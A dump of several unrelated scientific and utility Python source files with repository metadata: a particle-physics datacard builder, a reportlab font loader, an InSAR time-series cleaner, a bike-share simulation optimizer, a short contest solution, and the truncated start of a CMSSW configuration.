    #Get observations (data event counts per bin)
    datafile = ROOT.TFile.Open(arguments.data,"READ")
    obs = getObservation(arguments.channel, datafile,arguments.observable)
    logging.debug( obs )

    #Printout observation block to file
    obsline = pd.DataFrame(obs[arguments.channel], columns=binlist[arguments.channel], index=['observation'])
    print >> arguments.outfile, '-'*100
    print >> arguments.outfile, 'bin', obsline
    print >> arguments.outfile, '-'*100

    #Get MC rate predictions
    rate = mcRate(arguments.channel,files,arguments.observable)
    logging.debug( rate )

    ch_dfs = []
    for proc in proc_id.keys():
        #Create new table for given process, default 'NA' for every
        #systematic that does not apply to it
        s = pd.DataFrame('NA',
                        columns=binlist[arguments.channel],
                        index=systtypelist[arguments.channel].keys()
                        )
        #Fill systematics description for this process
        #Normalization systematics
        df_update = pd.DataFrame.from_dict(syst_norm_size_list[arguments.channel][proc], orient='index')
        df_update.columns = binlist[arguments.channel]
        s.update(df_update)
        #Shape systematics
        df_update = pd.DataFrame.from_dict(syst_shape_size_list[arguments.channel][proc], orient='index')
        df_update.columns = binlist[arguments.channel]
        s.update(df_update)

        #Add process labels and id (first and second line, respectively).
        #NOTE(review): .ix is deprecated pandas indexing; this splicing
        #relies on positional .ix slices to prepend rows -- order matters.
        processline = pd.DataFrame(proc, columns=binlist[arguments.channel], index=['process'])
        s = pd.concat([s.ix[:0], processline, s.ix[0:]])
        processline = pd.DataFrame(proc_id[proc], columns=binlist[arguments.channel], index=['process '])
        s = pd.concat([s.ix[:1], processline, s.ix[1:]])
        rateline = pd.DataFrame(rate[proc][arguments.channel], columns=binlist[arguments.channel], index=['rate'])
        s = pd.concat([s.ix[:2], rateline, s.ix[2:]])
        print arguments.channel, proc
        logging.debug(s)
        ch_dfs.append(s)

    result = pd.concat(ch_dfs,axis=1)
    #Add column with systematic type (normalization or shape)
    lam = lambda x: systtypelist[arguments.channel][x] if x in systtypelist[arguments.channel] else ''
    result.insert(0,' ',result.index.map(lam))

    #Printout MC (rate and systematics) block to file
    print >> arguments.outfile, 'bin', result

    return 0
if __name__ == '__main__':
    # Command-line entry point: parse arguments, configure logging, run
    # main() and report total wall-clock time.
    start_time = time.time()
    parser = argparse.ArgumentParser(
            description=__doc__,
            formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('--data', help="Data rootfile", required=True)
    # --source takes a JSON dict mapping process name -> input ROOT file
    parser.add_argument("--source", type=json.loads, dest='sources',
            help='json dictionary with input definition', required=True)
    parser.add_argument('--channel', help="channel",default='mu')
    parser.add_argument('--observable', help="observable",default='allSF/bdt')
    parser.add_argument('-o', '--outfile', help="Output file",
            default=sys.stdout, type=argparse.FileType('w'))
    parser.add_argument(
            '-d', '--debug',
            help="Print lots of debugging statements",
            action="store_const", dest="loglevel", const=logging.DEBUG,
            default=logging.WARNING,
            )
    parser.add_argument(
            '-v', '--verbose',
            help="Be verbose",
            action="store_const", dest="loglevel", const=logging.INFO,
            )
    args = parser.parse_args(sys.argv[1:])
    print(args)

    logging.basicConfig(level=args.loglevel)
    logging.info( time.asctime() )
    exitcode = main(args)
    logging.info( time.asctime() )
    logging.info( 'TOTAL TIME IN MINUTES:' + str((time.time() - start_time) / 60.0))
    sys.exit(exitcode)
|
[
"denys.lontkovskyi@cern.ch"
] |
denys.lontkovskyi@cern.ch
|
ca740ae582457f4d38da6e850951c4b048df0f9b
|
e3fbf247380f21bb309c5fb85620a32c7c0a73ac
|
/docservice/fonts/font_utils.py
|
017b9671a745162110c69526a082053bc52486cd
|
[
"MIT"
] |
permissive
|
kumardeepak/ExportPDF
|
59cad27a6072ca31f63d82ac07f91fe1b273b350
|
b336afaf1c023d156e9df3e3f608b8d9366d635a
|
refs/heads/master
| 2023-03-31T00:17:24.397189
| 2021-04-09T06:13:00
| 2021-04-09T06:13:00
| 346,559,150
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
import os
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
class FontUtils(object):
    """Helper for registering TrueType fonts with reportlab."""

    @classmethod
    def load_font(cls, font_name='arial-unicode-ms'):
        """Register `<font_name>.ttf` under the name *font_name* with
        reportlab's pdfmetrics so it can be used in generated PDFs.

        The font file is looked up in ./fonts relative to the current
        working directory, so the process must be started from the
        project root for the file to be found.
        """
        # Renamed the classmethod's first parameter from `self` to the
        # conventional `cls`; behavior is unchanged.
        pdfmetrics.registerFont(TTFont(font_name, os.path.join(os.getcwd(), 'fonts', font_name + '.ttf')))
|
[
"0xbeefdead@gmail.com"
] |
0xbeefdead@gmail.com
|
6111b1bc7f4ae1ae73387fba875d19819f819d5b
|
aa7d7099e4d3fede60a177c962f548dbdf1e213e
|
/utils/clean_ts.py
|
16c579615c24607be97305ac6622a15a45050734
|
[
"MIT"
] |
permissive
|
NieYi/PyGdalSAR
|
f7f1ea0b9e3e961438c5f47357e3ec2fd2cf8411
|
7fcda1d927d1274f5419760efb7c0707ae1d44ef
|
refs/heads/master
| 2020-05-27T09:22:55.588790
| 2019-05-23T11:53:43
| 2019-05-23T11:53:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,706
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
############################################
#
# PyGdalSAR: An InSAR post-processing package
# written in Python-Gdal
#
############################################
# Author : Simon DAOUT (Oxford)
############################################
"""\
clean_ts.py
-------------
Clean a time series file (cube in binary format) given an other real4 file (mask) and a threshold on this mask
Usage: clean_ts.py --infile=<path> --mask=<path> --threshold=<value> --outfile=<path> \
[--perc=<value>] [--vmin=<value>] [--vmax=<value>] [--rampmask=<yes/no>] \
[--flatten_mask=<path>] [--lectfile=<path>] [--scale=<value>] [--imref=<value>] \
[--images=<path>] [--clean=<values>] [--crop=<values>] [--clean_demerr=<path>]
Options:
-h --help Show this screen.
--infile PATH path to time series (depl_cumule)
--outfile PATH output file
--mask PATH r4 file used as mask
--flatten_mask PATH output r4 flatten mask [default: None]
--rampmask VALUE flatten mask [default: yes]
--threshold VALUE threshold value on mask file (Keep pixel with mask > threshold)
--scale VALUE scale the mask [default:1]
--lectfile PATH Path of the lect.in file [default: lect.in]
--imref VALUE Reference image number [default: 1]
--images PATH Path to image_retuenues file [default: images_retenues]
--clean VALUE Clean option [default: 0,0,0,0]
--crop VALUE Crop option [default: 0,nlign,0,ncol]
--vmax Max colorscale [default: 98th percentile]
--vmin Min colorscale [default: 2th percentile]
--perc VALUE Percentile of hidden LOS pixel for the estimation and clean outliers [default:99.9]
--clean_demerr Path to dem error file
"""
# numpy
import numpy as np
from numpy.lib.stride_tricks import as_strided
import os
import matplotlib as mpl
from matplotlib import pyplot as plt
import matplotlib.cm as cm
from pylab import *
# scipy
import scipy
import scipy.optimize as opt
import scipy.linalg as lst
import docopt
# ---- Command-line parsing (docopt reads the module docstring) ----
arguments = docopt.docopt(__doc__)

infile = arguments["--infile"]
outfile = arguments["--outfile"]
maskf = arguments["--mask"]
seuil = float(arguments["--threshold"])

if arguments["--rampmask"] == None:
    rampmask = "no"
else:
    rampmask = arguments["--rampmask"]
if arguments["--lectfile"] == None:
    lecfile = "lect.in"
else:
    lecfile = arguments["--lectfile"]
if arguments["--scale"] == None:
    scale = 1.
else:
    scale = float(arguments["--scale"])
# NOTE(review): docopt returns strings, so the elif below compares a str to
# the int 1 (always False under Python 2's mixed-type ordering) -- the
# bounds check on --imref is effectively dead.  Confirm intent.
if arguments["--imref"] == None:
    imref = 0
elif arguments["--imref"] < 1:
    print '--imref must be between 1 and Nimages'
else:
    imref = int(arguments["--imref"]) - 1

# read lect.in: first two whitespace-separated ints are ncol, nlign
ncol, nlign = map(int, open(lecfile).readline().split(None, 2)[0:2])

# --clean gives a sub-window (line/col bounds) to blank out in every date
if arguments["--clean"] == None:
    mask = [0,0,0,0]
else:
    print arguments["--clean"]
    mask = map(float,arguments["--clean"].replace(',',' ').split())
mibeg,miend,mjbeg,mjend = int(mask[0]),int(mask[1]),int(mask[2]),int(mask[3])

# --crop restricts the plotted window only
if arguments["--crop"] == None:
    crop = [0,nlign,0,ncol]
else:
    crop = map(float,arguments["--crop"].replace(',',' ').split())
ibeg,iend,jbeg,jend = int(crop[0]),int(crop[1]),int(crop[2]),int(crop[3])

if arguments["--perc"] == None:
    perc = 99.9
else:
    perc = float(arguments["--perc"])

# Optional DEM-error correction map; zeros disable the correction
if arguments["--clean_demerr"] == None:
    demf = 'no'
    dem = np.zeros((nlign,ncol))
else:
    demf = arguments["--clean_demerr"]
    extension = os.path.splitext(demf)[1]
    if extension == ".tif":
        # NOTE(review): gdal is used here but never imported in this file
        # -- the .tif branch raises NameError as written.  Confirm.
        ds = gdal.Open(demf, gdal.GA_ReadOnly)
        dem = ds.GetRasterBand(1).ReadAsArray()
    else:
        dem = np.fromfile(demf,dtype=np.float32).reshape((nlign,ncol))
# ---- Load acquisition list and mask; optionally flatten a quadratic ramp ----
# load images_retenues file: image numbers, dates and perpendicular baselines
fimages='images_retenues'
nb,idates,dates,base=np.loadtxt(fimages, comments='#', usecols=(0,1,3,5), unpack=True,dtype='i,i,f,f')
# nb images
N=len(dates)
print 'Number images: ', N

# open mask file (flat binary float32, nlign x ncol), apply scale and mark
# zero / >999 pixels as NaN
mask = np.zeros((nlign,ncol))
fid2 = open(maskf, 'r')
mask = np.fromfile(fid2,dtype=np.float32).reshape((nlign,ncol))
mask = mask*scale
kk = np.nonzero(np.logical_or(mask==0.0, mask>999.))
mask[kk] = float('NaN')

if rampmask=='yes':
    # Fit a quadratic ramp a*rg^2 + b*rg + c*az^2 + d*az + e to the valid
    # mask pixels and subtract it from the whole mask.
    index = np.nonzero( ~np.isnan(mask))
    temp = np.array(index).T
    maski = mask[index].flatten()
    az = temp[:,0]; rg = temp[:,1]
    G=np.zeros((len(maski),5))
    G[:,0] = rg**2
    G[:,1] = rg
    G[:,2] = az**2
    G[:,3] = az
    G[:,4] = 1
    x0 = lst.lstsq(G,maski)[0]
    _func = lambda x: np.sum(((np.dot(G,x)-maski))**2)
    _fprime = lambda x: 2*np.dot(G.T, (np.dot(G,x)-maski))
    pars = opt.fmin_slsqp(_func,x0,fprime=_fprime,iter=200,full_output=True,iprint=0)[0]
    # NOTE(review): the SLSQP result above is immediately overwritten by
    # the closed-form normal-equation solution below -- confirm which one
    # is intended.
    pars = np.dot(np.dot(np.linalg.inv(np.dot(G.T,G)),G.T),maski)
    a = pars[0]; b = pars[1]; c = pars[2]; d = pars[3]; e = pars[4]
    print 'Remove ramp mask %f x**2 %f x  + %f y**2 + %f y + %f for : %s'%(a,b,c,d,e,maskf)

    # Evaluate the fitted ramp on the full grid and subtract it
    G=np.zeros((len(mask.flatten()),5))
    for i in xrange(nlign):
        G[i*ncol:(i+1)*ncol,0] = np.arange((ncol))**2
        G[i*ncol:(i+1)*ncol,1] = np.arange((ncol))
        G[i*ncol:(i+1)*ncol,2] = i**2
        G[i*ncol:(i+1)*ncol,3] = i
    G[:,4] = 1
    temp = (mask.flatten() - np.dot(G,pars))
    maskflat=temp.reshape(nlign,ncol)
    # maskflat = (temp - np.nanmin(temp)).reshape(nlign,ncol)
else:
    # pass
    maskflat = np.copy(mask)

# Color scale for the diagnostic plots (the percentile value is
# immediately overridden to 1)
vmax = np.nanpercentile(maskflat,99)
vmax=1

# Pixels with flattened mask above the threshold are discarded
kk = np.nonzero(maskflat>seuil)
spacial_mask = np.copy(maskflat)
spacial_mask[kk] = float('NaN')

# Diagnostic figure: raw mask, flattened mask, and the resulting keep-mask
nfigure=0
fig = plt.figure(0,figsize=(9,4))
ax = fig.add_subplot(1,3,1)
cax = ax.imshow(mask,cmap=cm.jet,vmax=vmax,vmin=0)
ax.set_title('RMSpixel')
setp( ax.get_xticklabels(), visible=False)
fig.colorbar(cax, orientation='vertical',aspect=10)

ax = fig.add_subplot(1,3,2)
cax = ax.imshow(maskflat,cmap=cm.jet,vmax=vmax,vmin=0)
ax.set_title('flat RMSpixel')
setp( ax.get_xticklabels(), visible=False)
fig.colorbar(cax, orientation='vertical',aspect=10)

ax = fig.add_subplot(1,2,2)
cax = ax.imshow(spacial_mask,cmap=cm.jet,vmax=vmax,vmin=0)
ax.set_title('Mask')
setp( ax.get_xticklabels(), visible=False)
fig.colorbar(cax, orientation='vertical',aspect=10)
del spacial_mask, mask

# plt.show()
# sys.exit()

# Optionally save the flattened mask as flat float32 binary
if arguments["--flatten_mask"] != None:
    # save clean ts
    fid = open(arguments["--flatten_mask"], 'wb')
    maskflat.flatten().astype('float32').tofile(fid)
    fid.close()
# ---- Load the time-series cube, clean it, save and plot ----
# lect cube: flat float32 binary of nlign x ncol x N displacement maps
cubei = np.fromfile(infile,dtype=np.float32)
cube = as_strided(cubei[:nlign*ncol*N])
# 9990/9999 are no-data sentinels
kk = np.flatnonzero(np.logical_or(cube==9990, cube==9999))
cube[kk] = float('NaN')

# Outlier bounds from the --perc percentile of non-zero values
_cube=np.copy(cube)
_cube[cube==0] = np.float('NaN')
maxlos,minlos=np.nanpercentile(_cube,perc),np.nanpercentile(_cube,(100-perc))
print maxlos,minlos
# sys.exit()

print 'Number of line in the cube: ', cube.shape
maps = cube.reshape((nlign,ncol,N))
print 'Reshape cube: ', maps.shape

# Pixels rejected for ALL dates: outliers in the last map, or pixels whose
# flattened mask exceeds the threshold
kk = np.nonzero(
    np.logical_or(maps[:,:,-1]<minlos,
    np.logical_or(maps[:,:,-1]>maxlos,
    # np.logical_or(maps[:,:,-1]==0,
    maskflat>seuil
    )))
    # )

# clean: reference each date to the --imref map, apply the DEM-error
# correction scaled by the baseline difference, blank rejected pixels and
# the --clean sub-window
cst = np.copy(maps[:,:,imref])
for l in xrange((N)):
    d = as_strided(maps[:,:,l])
    d[kk] = np.float('NaN')
    # carefull stupid unit: baselines divided by 100 here
    maps[:,:,l] = maps[:,:,l] - cst - dem*(base[l]-base[imref])/100.
    if l != imref:
        index = np.nonzero(d==0.0)
        d[index] = np.float('NaN')
    maps[mibeg:miend,mjbeg:mjend,l] = np.float('NaN')

# Color scale for the output plots; 4.4563 converts phase to displacement
# units (rad -> mm presumably -- TODO confirm wavelength factor)
if arguments["--vmax"] == None:
    vmax = np.nanpercentile(maps, 98)*4.4563
else:
    vmax = np.float(arguments["--vmax"])

if arguments["--vmin"] == None:
    vmin = np.nanpercentile(maps, 2)*4.4563
else:
    vmin = np.float(arguments["--vmin"])

# save clean ts cube as flat float32 binary
fid = open(outfile, 'wb')
maps.flatten().astype('float32').tofile(fid)
fid.close()

# plot displacements maps, one panel per acquisition date
fig = plt.figure(1,figsize=(14,10))
fig.subplots_adjust(wspace=0.001)
# vmax = np.abs([np.nanmedian(maps[:,:,-1]) + 1.*np.nanstd(maps[:,:,-1]),\
#         np.nanmedian(maps[:,:,-1]) - 1.*np.nanstd(maps[:,:,-1])]).max()
# vmin = -vmax
for l in xrange((N)):
    d = as_strided(maps[ibeg:iend,jbeg:jend,l])*4.4563
    #ax = fig.add_subplot(1,N,l+1)
    ax = fig.add_subplot(4,int(N/4)+1,l+1)
    #cax = ax.imshow(d,cmap=cm.jet,vmax=vmax,vmin=vmin)
    cmap = cm.jet
    cmap.set_bad('white')
    cax = ax.imshow(d,cmap=cm.jet,vmax=vmax,vmin=vmin)
    ax.set_title(idates[l],fontsize=6)
    setp( ax.get_xticklabels(), visible=False)
    setp( ax.get_yticklabels(), visible=False)
    setp(ax.get_xticklabels(), visible=False)
    setp(ax.get_yticklabels(), visible=False)
fig.tight_layout()
plt.suptitle('Time series maps')
fig.colorbar(cax, orientation='vertical',aspect=10)
fig.savefig('maps_clean.eps', format='EPS',dpi=150)
plt.show()
|
[
"simondaout@gmail.com"
] |
simondaout@gmail.com
|
efbbc357d3a95af5916f903b84babff1014b4d80
|
8b115f778e05db8ae4a4cdc412c4d18e31342b3f
|
/Projects/Simulation/gradSearchNonstop.py
|
fc69cfa2877dd23cfb79545eecdc565a7c3b815a
|
[] |
no_license
|
njian/bikesharSimOpt
|
a6bee8aa8dd066c57722c6977de1f9a938f54992
|
053f7e53a87f9a0ad86faaa77126a6c1392166a3
|
refs/heads/master
| 2021-03-30T18:04:06.260084
| 2017-08-04T03:35:59
| 2017-08-04T03:35:59
| 42,687,690
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,682
|
py
|
import SimulationRunner_v2 as SimulationRunner
import math, random
import numpy
import time
import cPickle
from collections import Counter
import logging
def simulate(level, sM, durations, rep, seed, mbm, simMethod, startTime, numIntervals):
    # Run `rep` independent simulation replications of the bike-share model
    # for the given station fill levels, and return:
    #   (per-rep raw results, mean objective, 95% CI half-width,
    #    failed-start counts per station, failed-end counts per station).
    # The objective per rep is the sum of the first three entries of the
    # simulator's result tuple.
    t0 = time.time()
    numpy.random.seed(seed) # starting seed for round of reps
    soln = 0  # NOTE(review): never used below
    s1 = []
    s2 = []
    solutionList = []
    solutionList2 = []
    for i in range(rep):
        data = SimulationRunner.testVehicles2(level, sM, mbm, durations, simMethod, startTime, numIntervals)
        solutionList.append(data)
        solutionList2.append(float(sum(data[0:3])))
        if data[3] != -1:
            s1.extend(data[3]) # all failed start sids in this rep
        if data[4] != -1:
            s2.extend(data[4]) # all failed end sids in this rep
    obj = round(numpy.mean(solutionList2, axis=0), 2)
    # 1.96 * stddev / sqrt(rep): 95% normal-approximation CI half-width
    ciwidth = round(numpy.std(solutionList2)*1.96/numpy.sqrt(rep), 2)
    statE = Counter(s1).most_common() # produces a list with [0]=sid and [1]=failedStarts
    statF = Counter(s2).most_common() # produces a list with [0]=sid and [1]=failedEnds
    # print "Most common failed starts: ", statE
    # print "Most common failed ends: ", statF
    print "time in simulate() ", time.time() - t0, " with rep ", rep
    return (solutionList, obj, ciwidth, statE, statF)
    # return (obj, ciwidth)
def storePickle(results, level, fileName):
    ''' Store pickle '''
    # Persist the raw simulation results and the station fill levels side
    # by side under ./outputsDO/ so a run can be reloaded for analysis.
    fileName1 = ("./outputsDO/%s.p" % (fileName + 'Results'))
    fileName2 = ("./outputsDO/%s.p" % (fileName + 'Level'))
    # Use context managers so the file handles are closed deterministically
    # (the original passed open(...) straight into dump and never closed).
    with open(fileName1, 'wb') as results_file:
        cPickle.dump(results, results_file)
    with open(fileName2, 'wb') as level_file:
        cPickle.dump(level, level_file)
# Basic Solution: randomSearch start of code
def basicSoln(sM, mbm, daySeed, reps, simMethod = "AltCond", startTime = 420, numIntervals = 4):
    # Evaluate the "do nothing" baseline: simulate with each station's
    # current bike count and return (runtime seconds, mean objective,
    # CI half-width).
    logger1 = logging.getLogger('gradSearch')
    sidList = []  # NOTE(review): built but never used in this function
    level = {}
    # Read solution: current fill level per station
    for sid in sM:
        sidList.append(sid)
        level[sid] = sM[sid]['bikes']
    start = time.time()
    # NOTE(review): simulate() takes 9 positional arguments
    # (level, sM, durations, rep, seed, mbm, simMethod, startTime,
    # numIntervals) but only 8 are passed here -- `durations` appears to be
    # missing, so as written this call raises TypeError.  Confirm against
    # simulate()'s signature and the other call site in randomSearch().
    objAll, obj0, ciwidth, statE, statF = simulate(level, sM, reps, daySeed, mbm, simMethod, startTime, numIntervals)
    end = time.time()
    runTime = round(end - start,3)
    return runTime, obj0, ciwidth
def randomSearch(sM, mbm, durations, startTime, numIntervals, config):
    """Randomized local search over the station bike allocation.

    Each iteration moves `nswap` bikes from a station that frequently ends
    full (statF) to one that frequently starts empty (statE); the move is
    kept only when the simulated objective improves.  Runs until Ctrl-C,
    then 'quit' stops and records, 'break' exits the loop immediately.

    config = [daySeed, listLength, simulationMethod, randomSwap, rep].
    NOTE(review): `simMethod` and `fileName` used below resolve to
    module-level globals set in __main__ (config[2] is read into
    `simulationMethod` but never used) -- confirm this is intended.
    """
    ''' Configurations '''
    nswap = 1 # initial number to swap in each iteration
    logger1 = logging.getLogger('gradSearch_v2')
    daySeed = config[0]
    listLength = config[1]
    simulationMethod = config[2]
    randomSwap = config[3]
    rep = config[4]
    logger1 = logging.getLogger('gradSearch_v2')
    start = time.time()
    simCount = 0 # count of total simulation days
    diff = -1
    sidList = []
    level = {}
    # Read solution: starting bike count per station id.
    for sid in sM:
        sidList.append(sid)
        level[sid] = sM[sid]['bikes']
    obj1 = 0.0
    # Baseline evaluation of the starting allocation (50 replications).
    objAll, obj0, ciwidth, statE, statF = simulate(level, sM, durations, 50, daySeed, mbm, simMethod, startTime, numIntervals)
    logger1.warning( ("Obj0: " + str(obj0) + " ciwidth " + str(ciwidth)) )
    obj00 = obj0
    ciwidth00 = ciwidth
    results = {}
    results[0] = objAll
    seed = daySeed # random seed
    failedswap = 0
    failedSinceLastChange = 0
    improve = -999
    while True: # Stopping criteria
        try:
            ''' Decrease the number of swaps adaptively '''
            ''' Generate the sid lists to choose from '''
            # Candidate receivers (sidEList): up to listLength of the most
            # frequently failed-start stations with room for nswap more bikes.
            sidEList = []
            sidFList = []
            showsidEList = []
            showsidFList = []
            n1 = 0
            n2 = 0
            com = 0 # select the most common empty/full station at first
            while n1<listLength and com<=len(statE)-1:
                sidE = statE[com][0]
                if sidE != -1 and level[sidE] + nswap <= float(sM[sidE]['capacity']):
                    sidEList.append(sidE)
                    showsidEList.append([sidE, statE[com][1]])
                    n1+=1
                com+=1
            com = 0
            # Candidate donors (sidFList): most frequently failed-end stations
            # that can spare nswap bikes without going negative.
            while n2<listLength and com<=len(statF)-1:
                sidF = statF[com][0]
                if sidF != -1 and level[sidF] - nswap >= 0.0:
                    sidFList.append(sidF)
                    showsidFList.append([sidF, statF[com][1]])
                    n2+=1
                com+=1
            ''' Randomly choose two stations from the lists '''
            logger1.debug( ("sidEList: " + ', '.join(str(sid) for sid in showsidEList)) )
            logger1.debug( ("sidFList: " + ', '.join(str(sid) for sid in showsidFList)) )
            sidE = random.choice(sidEList)
            sidF = random.choice(sidFList)
            logger1.info( ("Found up, dn: sid" + str(sidE) + ", lvl " + str(level[sidE]) +
                           "; sid" + str(sidF) + ", lvl " + str(level[sidF])) )
            # NOTE(review): no .copy() here, so TrySoln aliases `level` and a
            # rejected swap is NOT rolled back -- confirm this is intended.
            TrySoln = level#.copy()
            simCount += rep
            # try swapping
            TrySoln[sidE] += nswap
            TrySoln[sidF] -= nswap
            objAll1, obj1,ciwidth1,statE,statF = simulate(TrySoln, sM, durations, rep, daySeed, mbm, simMethod, startTime, numIntervals)
            diff = obj0 - obj1
            # if improved, do the swap, else, restore solution
            if diff>0.0:
                improve = diff
                level = TrySoln
                obj0 = obj1
                results[simCount] = objAll1
                logger1.warning( ("Improve: Obj1 = " + str(obj1) + " with ciwidth " + str(ciwidth1) +
                                  " by " + str(diff) + " move " + str(nswap) + " from " + str(sidF) + " to " + str(sidE)) )
                failedswap = 0 # suceed, reset number of attempts for this starting sol
                failedSinceLastChange = 0
            else:
                failedswap += 1
                failedSinceLastChange += 1
                logger1.info( ("Failed to move " + str(nswap) + " from " + str(sidF) + " to " + str(sidE) +
                               " failed number: " + str(failedswap)) )
            logger1.warning( ("last improvement " + str(improve) + ", last obj" + str(obj0) + ", simCount" + str(simCount)) )
            if (simCount-50) % (rep*10) == 0: # store every 10 iterations
                storePickle(results, level, fileName)
        except KeyboardInterrupt:
            print '\nPausing... (Hit ENTER to continue, type quit to stop optimization and record solutions, type break to exit immediately.)'
            try:
                response = raw_input()
                if response == 'quit':
                    break
                    # NOTE(review): everything below in this branch is
                    # unreachable after the break above (it also references an
                    # undefined `soln`) -- confirm whether the break or this
                    # block should be removed.
                    objAllFinal, objFinal, ciwidthFinal, statE1, statF1 = simulate(level, sM, durations, 100, daySeed+1, mbm, simMethod, startTime, numIntervals)
                    end = time.time()
                    logger1.warning( ("Starting objective value: " + str(obj00) + ", ciwidth: " + str(ciwidth00)) )
                    logger1.warning( ("Starting objective value: " + str(obj00) + ", ciwidth: " + str(ciwidth00)) )
                    logger1.warning( ("Final objective value: " + str(objFinal) + ", Final ciwidth: " + str(ciwidthFinal)) )
                    logger1.warning( ("Total solutions evaluated by simulation = " + str(simCount/rep)) )
                    logger1.warning( ("Last failed number of swaps = " + str(failedswap)) )
                    logger1.warning( ("Elapsed time: " + str(end-start)) )
                    storePickle(results, level, fileName)
                    return (soln, objFinal, objAllFinal, ciwidthFinal)
                elif response == 'break':
                    break
                print 'Resuming...'
            except KeyboardInterrupt:
                print 'Resuming...'
                continue
    # Final evaluation of the accepted allocation: 100 replications, new seed.
    objAllFinal, objFinal, ciwidthFinal, statE1, statF1 = simulate(level, sM, durations, 100, daySeed+1, mbm, simMethod, startTime, numIntervals)
    end = time.time()
    logger1.warning( ("Starting objective value: " + str(obj00) + ", ciwidth: " + str(ciwidth00)) )
    logger1.warning( ("Final objective value: " + str(objFinal) + ", Final ciwidth: " + str(ciwidthFinal)) )
    logger1.warning( ("Total solutions evaluated by simulation = " + str(simCount/rep)) )
    logger1.warning( ("Last failed number of swaps = " + str(failedswap)) )
    logger1.warning( ("Elapsed time: " + str(end-start)) )
    storePickle(results, level, fileName)
    return end-start, objFinal, ciwidthFinal, obj00, ciwidth00
if __name__ == '__main__':
    ''' Configurations '''
    seed = 8
    randListSize = 10 # length of the list for randomized search. 1 is greedy.
    reps = 30 # number of replications to evaluate each trial solution
    start = 6 # start hour
    end = 10 # end hour
    startTime = int(start*60) # simulation start time (minutes, from 0 to 1439)
    numIntervals = int(2*(end-start)) # number of 30-minute intervals to simulate
    solutionName = 'CTMCVaryRateBikesOnly' + str(start) + "-" + str(end) + '_15x'
    simMethod = 'AltCond'
    # Random file id so concurrent runs don't clobber each other's outputs.
    fileInd = numpy.random.randint(1,99)
    fileName = (solutionName + "id" + str(fileInd))
    ''' Logging to File '''
    # set up logging to file (DEBUG and up goes to the .log file)
    logging.basicConfig(level=logging.DEBUG,
                        format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
                        datefmt='%m-%d %H:%M',
                        filename='./outputsDO/'+solutionName+'id'+str(fileInd)+'.log',
                        filemode='w')
    # define a Handler which writes INFO messages or higher to the sys.stderr
    console = logging.StreamHandler()
    console.setLevel(logging.INFO)
    # set a format which is simpler for console use
    formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
    # tell the handler to use this format
    console.setFormatter(formatter)
    # add the handler to the root logger
    logging.getLogger('').addHandler(console)
    logging.info('gradSearch_v2.py')
    logging.info('running CTMC')
    logging.info(('random seed = ' + str(seed)))
    logging.info(('reps = ' + str(reps)))
    logging.info(('list size = ' + str(randListSize)))
    logging.info(('solution name = ' + fileName))
    # get state map info (caps, ords)
    # NOTE(review): eval() on a data file executes arbitrary code; fine for
    # trusted local files, but consider ast.literal_eval.
    sM = eval(open(('./data/'+solutionName+'.txt')).read())
    logging.info('Finished loading station map.')
    # get min-by-min data
    start = time.time()  # NOTE: `start`/`end` are reused here as timestamps
    mbm = cPickle.load(open("./data/mbm30minDec_15x.p", 'r'))
    end = time.time()
    load_time = end - start
    logging.info('Finished loading flow rates. Time elapsed: %d' % load_time)
    logging.debug( ('Check length of mbm = ' + str(len(mbm))) )
    # get durations
    durations = eval(open('./data/durationsLNMultiplier2.txt').read())
    logging.info('Finished loading durations.')
    randSwap = False
    # Simulate and Optimize!
    config = [seed, randListSize, simMethod, randSwap, reps]
    runtime, objFinal, ciwidthFinal, obj00, ciwidth00 =randomSearch(sM, mbm, durations, startTime, numIntervals, config)
    logging.warning( ("Random search id: " + str(fileInd) + ", solution: " + str(objFinal) + ", ciwidth: " + str(ciwidthFinal) + ", elapsed time:" + str(runtime)) )
|
[
"nj227@cornell.edu"
] |
nj227@cornell.edu
|
1b97012401160d2833300c50a56795077b693f9d
|
94e8871731fc19f14f087dfa99086623348a35f5
|
/r574/B.py
|
c33d6f646f2c0d9c687d7380a66853d5c699fa92
|
[] |
no_license
|
jokkebk/codeforces
|
7792eded86c623e8a7d089bfb786619e6ab4a667
|
781b1faee8ab46a2466cafd6c7d75e51db22cf12
|
refs/heads/master
| 2023-08-10T04:42:01.856401
| 2023-07-28T20:34:33
| 2023-07-28T20:34:33
| 22,697,289
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 186
|
py
|
# Codeforces round solution: reads n and k from stdin, prints the answer a.
# can(n, e) = (n-e+1)*(n-e)//2 - e -- a triangular-number count used as the
# feasibility test below (exact problem semantics not restated here).
can = lambda n, e: (n-e+1)*(n-e)//2 - e
n, k = map(int, input().split())
a = 0
# Greedy bit-by-bit construction of a, from n's highest bit down to bit 0
# (len(bin(n)) - 3 is the index of n's top bit, since bin() prefixes '0b'):
# set bit i whenever the candidate stays below n and still has can(...) >= k.
for i in range(len(bin(n))-3, -1, -1):
    if a + 2**i < n and can(n, a + 2**i) >= k: a += 2**i
print(a)
|
[
"joonas.pihlajamaa@iki.fi"
] |
joonas.pihlajamaa@iki.fi
|
7163f816dfd5db84ab30220ee8fb101ce0b68c6c
|
66e6360325b781ed0791868765f1fd8a6303726f
|
/TB2009/WorkDirectory/5173 Pulse Timing/Pion_108538.py
|
e53460495e0c5366f4f533ec68de84b6c0a8447d
|
[] |
no_license
|
alintulu/FHead2011PhysicsProject
|
c969639b212d569198d8fce2f424ce866dcfa881
|
2568633d349810574354ad61b0abab24a40e510e
|
refs/heads/master
| 2022-04-28T14:19:30.534282
| 2020-04-23T17:17:32
| 2020-04-23T17:17:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,320
|
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("EventDisplay")

# Process every event in the input file (-1 = no limit).
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(-1)
)

# HCAL 2009 test-beam raw-data source; only the listed streams are read.
process.source = cms.Source("HcalTBSource",
    fileNames = cms.untracked.vstring("file:/tmp/chenyi/HTB_108538.root"),
